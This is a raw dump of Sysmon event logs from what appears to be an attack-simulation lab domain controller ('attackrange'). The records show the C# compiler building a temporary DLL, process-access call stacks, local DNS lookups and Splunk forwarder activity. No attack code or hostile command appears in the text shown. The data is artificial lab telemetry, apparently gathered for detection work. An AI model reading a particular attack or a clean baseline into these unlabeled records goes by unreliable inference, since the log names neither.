16:56:11.045{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.045{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES1E89.tmpMD5=A15757205D49CA191D1D72741FFBA13C,SHA256=7B3B13D1957D2D01936929942074E67522C12E49659B50E882A67315C4C80305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.045{05ADC7E1-6E2B-603E-F5AA-00000000AD01}13964ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES1E89.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2B-603E-F5AA-00000000AD01}13964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E2B-603E-F5AA-00000000AD01}13964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.029{05ADC7E1-6E2A-603E-F4AA-00000000AD01}148206840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-6E2B-603E-F5AA-00000000AD01}13964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.034{05ADC7E1-6E2B-603E-F5AA-00000000AD01}13964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES1E89.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\CSC877B13F5B1B340588E4C336B2712951.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.cmdline" 354300x80000000000000002243956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.549{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local49961- 354300x80000000000000002243955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.534{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55122- 23542300x80000000000000002243954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8ECD0E49221307CA3B04523DBB10B6C,SHA256=847B98BF716EF9DE3E9F4806F8C6B33159A453A1828BAAE8023F225283ED484B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCEB4A59B58A53542D12E4D3F49638F8,SHA256=6B3BA03A1CF8E3058BFB02CDCEECEB9D88F81B04307B120741DFD54A89BDB04E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.772{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F929643E09EBAA29DCDB48DB30CBAA57,SHA256=ACCF5CC389653F31C155B018C337A22FE5427195BA8A3ABE928566C632EBB418,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 